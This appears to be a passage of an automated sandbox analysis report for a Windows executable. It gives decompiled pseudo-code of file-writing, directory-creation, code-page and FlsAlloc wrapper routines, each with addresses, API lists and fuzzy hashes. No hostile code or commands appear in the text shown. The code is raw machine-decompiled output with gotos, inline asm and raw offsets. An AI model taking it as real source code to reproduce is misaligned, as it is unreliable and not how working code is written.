							if( *((char*)(_t53 + 0x14)) == 0 ||  *((intOrPtr*)(_t53 + 0xc)) != 0) {
								L21:
								 *((char*)(_t53 + 8)) = 1;
								return _t42;
							} else {
								_t56 = _t53 + 0x1e;
								if(E009E6C55(0xa200e0, _t53 + 0x1e, 0) == 0) {
									E009E6E9B(0xa200e0, _t59, 0, _t56);
									goto L21;
								}
								if(_a8 < _t59 && _a8 > 0) {
									_t58 =  *_t53;
									_t36 =  *((intOrPtr*)(_t58 + 0x14))(0);
									asm("sbb edx, 0x0");
									 *((intOrPtr*)(_t58 + 0x10))(_t36 - _a8, _t52);
								}
								continue;
							}
						} else {
							goto L7;
						}
						while(1) {
							L7:
							_t32 = _t59 - _t57;
							if(_t32 >= 0x4000) {
								_t32 = 0x4000;
							}
							_t10 = WriteFile( *(_t53 + 4), _a4 + _t57, _t32,  &_a8, 0) - 1; // -1
							asm("sbb bl, bl");
							_t42 =  ~_t10 + 1;
							if(_t42 == 0) {
								goto L14;
							}
							_t57 = _t57 + 0x4000;
							if(_t57 < _t59) {
								continue;
							}
							L13:
							if(_t42 != 0) {
								goto L21;
							}
							goto L14;
						}
						goto L14;
						L12:
						_t24 = WriteFile( *(_t53 + 4), _a4, _t59,  &_a8, 0); // executed
						asm("sbb al, al");
						_t42 =  ~(_t24 - 1) + 1;
						goto L13;
					}
				}
				return 1;
			}













                            0x009e9c34
                            0x009e9c35
                            0x009e9c3a
                            0x009e9c3e
                            0x009e9c4b
                            0x009e9c55
                            0x009e9c55
                            0x009e9c5a
                            0x009e9c5a
                            0x009e9c5f
                            0x009e9c65
                            0x00000000
                            0x00000000
                            0x009e9c67
                            0x009e9c6b
                            0x009e9ccf
                            0x009e9cd3
                            0x009e9d2d
                            0x009e9d30
                            0x00000000
                            0x009e9cdb
                            0x009e9cdd
                            0x009e9ced
                            0x009e9d28
                            0x00000000
                            0x009e9d28
                            0x009e9cf3
                            0x009e9d04
                            0x009e9d0a
                            0x009e9d13
                            0x009e9d18
                            0x009e9d18
                            0x00000000
                            0x009e9cf3
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e9c6d
                            0x009e9c6d
                            0x009e9c6f
                            0x009e9c76
                            0x009e9c78
                            0x009e9c78
                            0x009e9c95
                            0x009e9c9a
                            0x009e9c9c
                            0x009e9c9f
                            0x00000000
                            0x00000000
                            0x009e9ca1
                            0x009e9ca9
                            0x00000000
                            0x00000000
                            0x009e9ccb
                            0x009e9ccd
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e9ccd
                            0x00000000
                            0x009e9cad
                            0x009e9cbc
                            0x009e9cc5
                            0x009e9cc9
                            0x00000000
                            0x009e9cc9
                            0x009e9c5a
                            0x00000000

                            APIs
                            • GetStdHandle.KERNEL32(000000F5,?,?,009EC90A,00000001,?,?,?,00000000,009F4AF4,?,?,?,?,?,009F4599), ref: 009E9C4F
                            • WriteFile.KERNEL32(?,00000000,?,009F47A1,00000000,?,?,00000000,009F4AF4,?,?,?,?,?,009F4599,?), ref: 009E9C8F
                            • WriteFile.KERNELBASE(?,00000000,?,009F47A1,00000000,?,00000001,?,?,009EC90A,00000001,?,?,?,00000000,009F4AF4), ref: 009E9CBC
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FileWrite$Handle
                            • String ID:
                            • API String ID: 4209713984-0
                            • Opcode ID: 64eb28a2449e8c12e1a56d55a97b73b44696e11b538eb98ae64da7b06a95f02c
                            • Instruction ID: 7e118da99b008033722b532af84e3bcc75bc0c19ca3f958a33ed0d0fa291a001
                            • Opcode Fuzzy Hash: 64eb28a2449e8c12e1a56d55a97b73b44696e11b538eb98ae64da7b06a95f02c
                            • Instruction Fuzzy Hash: C831387110439AAFDB21AE16DC08BA6B7ECEB55300F208519F599571D0C774EC89CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E9EF2, Relevance: 4.6, APIs: 3, Instructions: 56COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E009E9EF2(void* __ecx, void* __eflags, WCHAR* _a4, char _a8, intOrPtr _a12) {
				short _v4100;
				signed int _t8;
				long _t10;
				void* _t11;
				int _t18;
				WCHAR* _t21;

				E009FD940();
				_t21 = _a4;
				_t8 =  *(E009EB927(__eflags, _t21)) & 0x0000ffff;
				if(_t8 == 0x2e || _t8 == 0x20) {
					L3:
					if(E009E9E6B(_t21) != 0 || E009EB32C(_t21,  &_v4100, 0x800) == 0 || CreateDirectoryW( &_v4100, 0) == 0) {
						_t10 = GetLastError();
						__eflags = _t10 - 2;
						if(_t10 == 2) {
							L12:
							_t11 = 2;
						} else {
							__eflags = _t10 - 3;
							if(_t10 == 3) {
								goto L12;
							} else {
								_t11 = 1;
							}
						}
					} else {
						goto L6;
					}
				} else {
					_t18 = CreateDirectoryW(_t21, 0); // executed
					if(_t18 != 0) {
						L6:
						if(_a8 != 0) {
							E009EA12F(_t21, _a12); // executed
						}
						_t11 = 0;
					} else {
						goto L3;
					}
				}
				return _t11;
			}









                            0x009e9efa
                            0x009e9f00
                            0x009e9f09
                            0x009e9f0f
                            0x009e9f23
                            0x009e9f2b
                            0x009e9f69
                            0x009e9f6f
                            0x009e9f72
                            0x009e9f7e
                            0x009e9f80
                            0x009e9f74
                            0x009e9f74
                            0x009e9f77
                            0x00000000
                            0x009e9f79
                            0x009e9f7b
                            0x009e9f7b
                            0x009e9f77
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e9f16
                            0x009e9f19
                            0x009e9f21
                            0x009e9f56
                            0x009e9f5a
                            0x009e9f60
                            0x009e9f60
                            0x009e9f65
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e9f21
                            0x009e9f85

                            APIs
                            • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,009E9DFE,?,00000001,00000000,?,?), ref: 009E9F19
                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,009E9DFE,?,00000001,00000000,?,?), ref: 009E9F4C
                            • GetLastError.KERNEL32(?,?,?,?,009E9DFE,?,00000001,00000000,?,?), ref: 009E9F69
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: CreateDirectory$ErrorLast
                            • String ID:
                            • API String ID: 2485089472-0
                            • Opcode ID: f0fbb5c2197c7e11a95b6f932bd3c619aff1dec84eb690632e8e82307c16e8c5
                            • Instruction ID: 388c47ae2ea561fc3593c0b6a5b561aa8feac1b83cb3873e87985e4e42a0edec
                            • Opcode Fuzzy Hash: f0fbb5c2197c7e11a95b6f932bd3c619aff1dec84eb690632e8e82307c16e8c5
                            • Instruction Fuzzy Hash: 2601B1315192D466DB33ABA79C05BFE334C9F4A781F044D51F901E60A2DBA4CD82C7A6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A0A51E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00A0A51E(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed char _v1828;
				signed int _t63;
				void* _t67;
				signed char _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t88;
				signed int _t91;
				signed int _t92;
				signed int _t93;
				void* _t94;
				char* _t95;
				intOrPtr _t99;
				signed int _t100;

				_t93 = __edx;
				_t63 =  *0xa1d668; // 0xda86b1c8
				_v8 = _t63 ^ _t100;
				_t99 = _a4;
				_t4 = _t99 + 4; // 0x5efc4d8b
				if(GetCPInfo( *_t4,  &_v1820) == 0) {
					_t47 = _t99 + 0x119; // 0xa0ab69
					_t94 = _t47;
					_t88 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t94;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t95 = _t94 + _t88;
						_t69 = _t68 + _t95;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t95 = 0;
							} else {
								_t72 = _t99 + _t88;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t88 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t99 + _t88 + 0x19) =  *(_t99 + _t88 + 0x19) | 0x00000010;
							_t54 = _t88 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t95 = _t73;
						}
						_t68 = _v1828;
						_t61 = _t99 + 0x119; // 0xa0ab69
						_t94 = _t61;
						_t88 = _t88 + 1;
						__eflags = _t88 - 0x100;
					} while (_t88 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t100 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t91 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t106 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t93 =  *(_t91 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t93;
							if(_t76 > _t93) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t100 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t91 = _t91 + 2;
						__eflags = _t91;
						_t75 =  *_t91;
					}
					_t13 = _t99 + 4; // 0x5efc4d8b
					E00A0B5EA(0, _t93, 0x100, _t99, _t106, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
					_t16 = _t99 + 4; // 0x5efc4d8b
					_t19 = _t99 + 0x21c; // 0x2ebf88b
					E00A097C2(0x100, _t99, _t106, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0); // executed
					_t21 = _t99 + 4; // 0x5efc4d8b
					_t23 = _t99 + 0x21c; // 0x2ebf88b
					E00A097C2(0x100, _t99, _t106, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
					_t92 = 0;
					do {
						_t68 =  *(_t100 + _t92 * 2 - 0x704) & 0x0000ffff;
						if((_t68 & 0x00000001) == 0) {
							__eflags = _t68 & 0x00000002;
							if((_t68 & 0x00000002) == 0) {
								 *(_t99 + _t92 + 0x119) = 0;
							} else {
								_t37 = _t99 + _t92 + 0x19;
								 *_t37 =  *(_t99 + _t92 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t68 =  *((intOrPtr*)(_t100 + _t92 - 0x304));
								goto L15;
							}
						} else {
							 *(_t99 + _t92 + 0x19) =  *(_t99 + _t92 + 0x19) | 0x00000010;
							_t68 =  *((intOrPtr*)(_t100 + _t92 - 0x204));
							L15:
							 *(_t99 + _t92 + 0x119) = _t68;
						}
						_t92 = _t92 + 1;
					} while (_t92 < 0x100);
				}
				return E009FE203(_t68, _v8 ^ _t100);
			}





























                            0x00a0a51e
                            0x00a0a529
                            0x00a0a530
                            0x00a0a535
                            0x00a0a540
                            0x00a0a552
                            0x00a0a64a
                            0x00a0a64a
                            0x00a0a650
                            0x00a0a652
                            0x00a0a653
                            0x00a0a653
                            0x00a0a655
                            0x00a0a65b
                            0x00a0a65b
                            0x00a0a65d
                            0x00a0a65f
                            0x00a0a668
                            0x00a0a66b
                            0x00a0a677
                            0x00a0a67e
                            0x00a0a68e
                            0x00a0a680
                            0x00a0a680
                            0x00a0a683
                            0x00a0a683
                            0x00a0a683
                            0x00a0a687
                            0x00a0a687
                            0x00000000
                            0x00a0a687
                            0x00a0a66d
                            0x00a0a66d
                            0x00a0a672
                            0x00a0a672
                            0x00a0a68a
                            0x00a0a68a
                            0x00a0a68a
                            0x00a0a690
                            0x00a0a696
                            0x00a0a696
                            0x00a0a69c
                            0x00a0a69d
                            0x00a0a69d
                            0x00a0a558
                            0x00a0a558
                            0x00a0a55a
                            0x00a0a55a
                            0x00a0a561
                            0x00a0a562
                            0x00a0a566
                            0x00a0a56c
                            0x00a0a572
                            0x00a0a59a
                            0x00a0a59a
                            0x00a0a59c
                            0x00000000
                            0x00000000
                            0x00a0a57b
                            0x00a0a57f
                            0x00a0a591
                            0x00a0a591
                            0x00a0a593
                            0x00000000
                            0x00000000
                            0x00a0a584
                            0x00a0a586
                            0x00a0a588
                            0x00a0a590
                            0x00a0a590
                            0x00000000
                            0x00a0a590
                            0x00000000
                            0x00a0a586
                            0x00a0a595
                            0x00a0a595
                            0x00a0a598
                            0x00a0a598
                            0x00a0a59f
                            0x00a0a5b4
                            0x00a0a5ba
                            0x00a0a5ce
                            0x00a0a5d5
                            0x00a0a5e4
                            0x00a0a5f6
                            0x00a0a5fd
                            0x00a0a605
                            0x00a0a607
                            0x00a0a607
                            0x00a0a611
                            0x00a0a621
                            0x00a0a623
                            0x00a0a63a
                            0x00a0a625
                            0x00a0a625
                            0x00a0a625
                            0x00a0a625
                            0x00a0a62a
                            0x00000000
                            0x00a0a62a
                            0x00a0a613
                            0x00a0a613
                            0x00a0a618
                            0x00a0a631
                            0x00a0a631
                            0x00a0a631
                            0x00a0a641
                            0x00a0a642
                            0x00a0a646
                            0x00a0a6b1

                            APIs
                            • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00A0A543
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Info
                            • String ID:
                            • API String ID: 1807457897-3916222277
                            • Opcode ID: eef1bd76d860cef4068ab5af6328d24025abdc33ed0aa87162fccd4634d75935
                            • Instruction ID: b2c570fd41896303fdd9169e87ef763302d8f2e90b2c199dc0219d132a0af336
                            • Opcode Fuzzy Hash: eef1bd76d860cef4068ab5af6328d24025abdc33ed0aa87162fccd4634d75935
                            • Instruction Fuzzy Hash: FF412B7150434C9FDF228F64DC84BFABBB9EB65304F1804ECE59A87182D236A945DF21
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E1D61, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76COMMON
                            Download Yara Rule
                            C-Code - Quality: 89%
                            			E009E1D61(intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t34;
				intOrPtr _t41;
				intOrPtr _t51;
				void* _t62;
				unsigned int _t64;
				signed int _t66;
				intOrPtr* _t68;
				void* _t70;

				_t62 = __edx;
				_t51 = __ecx;
				E009FD870(E00A11173, _t70);
				_t49 = 0;
				 *((intOrPtr*)(_t70 - 0x10)) = _t51;
				 *((intOrPtr*)(_t70 - 0x24)) = 0;
				 *(_t70 - 0x20) = 0;
				 *((intOrPtr*)(_t70 - 0x1c)) = 0;
				 *((intOrPtr*)(_t70 - 0x18)) = 0;
				 *((char*)(_t70 - 0x14)) = 0;
				 *((intOrPtr*)(_t70 - 4)) = 0;
				_t34 = E009E399D(_t51, _t62, _t70 - 0x24, 0, 0); // executed
				if(_t34 != 0) {
					_t64 =  *(_t70 - 0x20);
					E009E16C0(_t70 - 0x24, _t62, 1);
					_t68 =  *((intOrPtr*)(_t70 + 8));
					 *((char*)( *(_t70 - 0x20) +  *((intOrPtr*)(_t70 - 0x24)) - 1)) = 0;
					_t16 = _t64 + 1; // 0x1
					E009E1837(_t68, _t16);
					_t41 =  *((intOrPtr*)(_t70 - 0x10));
					if( *((intOrPtr*)(_t41 + 0x6cb0)) != 3) {
						if(( *(_t41 + 0x45f4) & 0x00000001) == 0) {
							E009F0FDE( *((intOrPtr*)(_t70 - 0x24)),  *_t68,  *((intOrPtr*)(_t68 + 4)));
						} else {
							_t66 = _t64 >> 1;
							E009F1059( *((intOrPtr*)(_t70 - 0x24)),  *_t68, _t66);
							 *((short*)( *_t68 + _t66 * 2)) = 0;
						}
					} else {
						_push( *((intOrPtr*)(_t68 + 4)));
						_push( *_t68);
						_push( *((intOrPtr*)(_t70 - 0x24)));
						E009F1094();
					}
					E009E1837(_t68, E00A02B33( *_t68));
					_t49 = 1;
				}
				E009E159C(_t70 - 0x24);
				 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
				return _t49;
			}











                            0x009e1d61
                            0x009e1d61
                            0x009e1d66
                            0x009e1d6f
                            0x009e1d73
                            0x009e1d76
                            0x009e1d79
                            0x009e1d7c
                            0x009e1d7f
                            0x009e1d82
                            0x009e1d8a
                            0x009e1d90
                            0x009e1d97
                            0x009e1d9f
                            0x009e1da7
                            0x009e1db2
                            0x009e1db5
                            0x009e1db9
                            0x009e1dbf
                            0x009e1dc4
                            0x009e1dce
                            0x009e1de6
                            0x009e1e07
                            0x009e1de8
                            0x009e1de8
                            0x009e1df0
                            0x009e1df9
                            0x009e1df9
                            0x009e1dd0
                            0x009e1dd0
                            0x009e1dd3
                            0x009e1dd5
                            0x009e1dd8
                            0x009e1dd8
                            0x009e1e17
                            0x009e1e1d
                            0x009e1e1f
                            0x009e1e23
                            0x009e1e2e
                            0x009e1e38

                            APIs
                            • __EH_prolog.LIBCMT ref: 009E1D66
                              • Part of subcall function 009E399D: __EH_prolog.LIBCMT ref: 009E39A2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: H_prolog
                            • String ID: CMT
                            • API String ID: 3519838083-2756464174
                            • Opcode ID: 2f6d2d0fa56c923db3883e7fa0e35d8aed5ea5cde8f8a707ddf1280c651c8c1d
                            • Instruction ID: 7ad386ad0e3bbfed536a647730e856bdfd38c13c3404f2d5b5ad0d98fde579cc
                            • Opcode Fuzzy Hash: 2f6d2d0fa56c923db3883e7fa0e35d8aed5ea5cde8f8a707ddf1280c651c8c1d
                            • Instruction Fuzzy Hash: 7D214B719041489FCB16EF99C941AEEFBF6FF98300B1004ADF855A7252CB325E50CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A09C64, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                            Download Yara Rule
                            C-Code - Quality: 37%
                            			E00A09C64(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _t18;
				intOrPtr* _t20;
				int _t22;
				intOrPtr* _t30;
				signed int _t32;

				_t25 = __ecx;
				_push(__ecx);
				_t18 =  *0xa1d668; // 0xda86b1c8
				_v8 = _t18 ^ _t32;
				_push(__esi);
				_t20 = E00A09990(0x16, "LCMapStringEx", 0xa16084, "LCMapStringEx"); // executed
				_t30 = _t20;
				if(_t30 == 0) {
					_t22 = LCMapStringW(E00A09CEC(_t25, _t30, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0xa12260(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					_t22 =  *_t30();
				}
				return E009FE203(_t22, _v8 ^ _t32);
			}









                            0x00a09c64
                            0x00a09c69
                            0x00a09c6a
                            0x00a09c71
                            0x00a09c74
                            0x00a09c86
                            0x00a09c8b
                            0x00a09c92
                            0x00a09cd5
                            0x00a09c94
                            0x00a09cb1
                            0x00a09cb7
                            0x00a09cb7
                            0x00a09ce9

                            APIs
                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,31E85006,00000001,?,000000FF), ref: 00A09CD5
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: String
                            • String ID: LCMapStringEx
                            • API String ID: 2568140703-3893581201
                            • Opcode ID: ca7375ea84e692184d7156ea5c7b70b303c6f40968e6de8ad543b95be90d6ff5
                            • Instruction ID: f9bce860eb5a15b30add44548a83554bd925b9fb212af57b149ef54b49b6b6f2
                            • Opcode Fuzzy Hash: ca7375ea84e692184d7156ea5c7b70b303c6f40968e6de8ad543b95be90d6ff5
                            • Instruction Fuzzy Hash: 8F01D33294121DBBCF12AF90DD05EEF3FAAFB08750F058514FE18661A1C6768971EB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A09C02, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                            Download Yara Rule
                            C-Code - Quality: 37%
                            			E00A09C02(void* __ecx, void* __esi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _t8;
				intOrPtr* _t10;
				int _t11;
				intOrPtr* _t19;
				signed int _t21;

				_push(__ecx);
				_t8 =  *0xa1d668; // 0xda86b1c8
				_v8 = _t8 ^ _t21;
				_t10 = E00A09990(0x14, "InitializeCriticalSectionEx", 0xa1607c, 0xa16084); // executed
				_t19 = _t10;
				if(_t19 == 0) {
					_t11 = InitializeCriticalSectionAndSpinCount(_a4, _a8);
				} else {
					 *0xa12260(_a4, _a8, _a12);
					_t11 =  *_t19();
				}
				return E009FE203(_t11, _v8 ^ _t21);
			}









                            0x00a09c07
                            0x00a09c08
                            0x00a09c0f
                            0x00a09c24
                            0x00a09c29
                            0x00a09c30
                            0x00a09c4d
                            0x00a09c32
                            0x00a09c3d
                            0x00a09c43
                            0x00a09c43
                            0x00a09c61

                            APIs
                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00A09291), ref: 00A09C4D
                            Strings
                            • InitializeCriticalSectionEx, xrefs: 00A09C1D
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: CountCriticalInitializeSectionSpin
                            • String ID: InitializeCriticalSectionEx
                            • API String ID: 2593887523-3084827643
                            • Opcode ID: cf70b6d49eb57420d3305622a54421e7acf60031c69aed716be481cd4674b6d0
                            • Instruction ID: f639bce4f98263f974f984916c97c14360d11fd08c3fc4d1a6483041b69212ed
                            • Opcode Fuzzy Hash: cf70b6d49eb57420d3305622a54421e7acf60031c69aed716be481cd4674b6d0
                            • Instruction Fuzzy Hash: B9F0B431A4121CFBCB11AF94DC05DEE7FA5EB08761B018114FE185A1A1CA718E61D780
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A09AA7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 37%
                            			E00A09AA7(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _t4;
				intOrPtr* _t6;
				long _t7;
				intOrPtr* _t15;
				signed int _t17;

				_push(__ecx);
				_t4 =  *0xa1d668; // 0xda86b1c8
				_v8 = _t4 ^ _t17;
				_t6 = E00A09990(3, "FlsAlloc", 0xa16040, 0xa16048); // executed
				_t15 = _t6;
				if(_t15 == 0) {
					_t7 = TlsAlloc();
				} else {
					 *0xa12260(_a4);
					_t7 =  *_t15();
				}
				return E009FE203(_t7, _v8 ^ _t17);
			}









                            0x00a09aac
                            0x00a09aad
                            0x00a09ab4
                            0x00a09ac9
                            0x00a09ace
                            0x00a09ad5
                            0x00a09ae6
                            0x00a09ad7
                            0x00a09adc
                            0x00a09ae2
                            0x00a09ae2
                            0x00a09afa

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Alloc
                            • String ID: FlsAlloc
                            • API String ID: 2773662609-671089009
                            • Opcode ID: f9b4069ca084673c1cd0ff3e1c47b7830ab026f147f0f2c79534e4c0514dc5cd
                            • Instruction ID: 3fbc526e98ec010999022f57e428c0f71f2e838fadcaf4a5384d09b7b701cb8c
                            • Opcode Fuzzy Hash: f9b4069ca084673c1cd0ff3e1c47b7830ab026f147f0f2c79534e4c0514dc5cd
                            • Instruction Fuzzy Hash: 41E0AB30B4020CB7C320EBA5AC06EEFBBA4EB08760B004418FC15572C1CE748E02C3C0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A0281A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                            Download Yara Rule
                            C-Code - Quality: 68%
                            			E00A0281A(void* __eflags, intOrPtr _a4) {
				intOrPtr* _t2;
				intOrPtr* _t6;

				_t2 = E00A026F9(4, "FlsAlloc", 0xa14394, "FlsAlloc"); // executed
				_t6 = _t2;
				if(_t6 == 0) {
					return TlsAlloc();
				}
				L009FE2DD();
				return  *_t6(_a4);
			}





                            0x00a0282f
                            0x00a02834
                            0x00a0283b
                            0x00a0284e
                            0x00a0284e
                            0x00a02842
                            0x00a0284b

                            APIs
                            • try_get_function.LIBVCRUNTIME ref: 00A0282F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: try_get_function
                            • String ID: FlsAlloc
                            • API String ID: 2742660187-671089009
                            • Opcode ID: 14813cfebf3589439f837b406cd231148d80408d4105130fd5dee885f65f10db
